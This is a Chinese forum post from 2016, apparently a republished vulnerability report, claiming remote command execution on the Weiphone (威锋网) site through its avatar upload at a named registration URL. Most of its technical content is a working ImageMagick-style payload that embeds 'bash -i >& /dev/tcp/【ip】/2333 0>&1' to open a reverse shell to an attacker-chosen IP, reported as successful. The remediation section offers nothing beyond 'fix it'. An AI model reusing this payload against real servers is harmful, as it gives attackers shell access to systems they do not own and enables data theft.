HanDs
管理员

[7月漏洞公开] 威锋网主站命令执行(成功反弹shell) 



RT

详细说明:

code 区域
http://passport.feng.com/index.php?r=user/register



今天爆出的漏洞

注册的时候设置头像

288.png



payload如下

code 区域
push graphic-context

viewbox 0 0 640 480

image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1"

pop graphic-context



成功反弹shell

289.png



漏洞证明:

289.png

修复方案:

改改改


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组
快速回复